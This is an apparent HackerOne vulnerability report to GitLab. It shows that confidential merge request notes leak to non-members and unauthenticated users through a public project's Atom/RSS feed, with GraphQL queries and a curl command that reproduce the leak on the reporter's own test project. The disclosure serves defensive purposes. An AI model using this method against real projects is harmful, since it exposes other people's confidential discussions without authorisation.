Confidential notes are visible to non-project members/unauthenticated users via project's RSS feed

HackerOne report #1130704 by jimeno on 2021-03-19, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

Steps to reproduce

Victim needs to create a project and post a confidential note to it.

1. As your victim, create a public project.

   

2. Create a MR on your project.

   

3. Find the MR object ID via the GraphQL API explorer. Replace my fullPath with yours.

   {  
     project(fullPath: "naaytesting2/h1testpublicproject") {  
       mergeRequest(iid: "1") {  
         id  
       }  
     }  
   }  

   

4. Add a confidential note the MR as your victim user. We use the GraphQL API explorer again for this. Replace the noteableId with the one you obtained in previous step.

   mutation xyz {  
     createNote(input: {noteableId: "gid://gitlab/MergeRequest/92779506", body: "confidential note", confidential: true}) {  
       errors  
       clientMutationId  
     }  
   }  

   

5. Confirm the confidential note was added to the MR by browsing to your MR and refreshing the page.

   

6. As your attacker, who is not a member of the project, visit the MR and confirm you can't view the confidential note.

   

7. As your attacker, browse to the RSS feed of the affected project https://gitlab.com/victimuser/projectname.atom and confirm you can read the confidential note created by victim.

   

8. Confirm you can view the confidential note as an unauthenticated user via a simple curl call to the RSS feed of the affected project.

   $ curl -s https://gitlab.com/naaytesting2/h1testpublicproject.atom | grep confi  
   <p data-sourcepos="1:1-1:17" dir="auto">confidential note</p>  

Impact

Confidential notes are visible to non-project members via project's RSS feed while the UI restricts the access to them.

Examples

Example project: https://gitlab.com/naaytesting2/h1testpublicproject.

Visit the MR at https://gitlab.com/naaytesting2/h1testpublicproject/-/merge_requests/1 and confirm you can't see the confidential note.

Visit https://gitlab.com/naaytesting2/h1testpublicproject.atom and confirm you can read the confidential note (<p data-sourcepos="1:1-1:17" dir="auto">confidential note</p>).

Please, find the example project exported and attached as a ZIP file. 2021-03-19_14-32-420_naaytesting2_h1testpublicproje_export.tar.gz

What is the current bug behavior?

Confidential notes are available to non-project members via RSS feed of the project.

What is the expected correct behavior?

Confidential notes aren't visible to non-project members via RSS feed of the project.

Relevant logs and/or screenshots

N/A

Output of checks

This bug happens on GitLab.com

Results of GitLab environment info

N/A

Impact

Confidential notes are visible to non-project members or unauthenticated users via project's RSS feed while the UI restricts the access to them.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• attacker_does_not_see_confidential_note_via_ui.png
• rss_feed_discloses_confidential_note.png
• create_confidential_note.png
• find_mr_id.png
• verify_confidential_note_was_created.png
• create_test_mr.png
• create_public_project.png
• 2021-03-19_14-32-420_naaytesting2_h1testpublicproje_export.tar.gz

How To Reproduce

Please add reproducibility information to this section: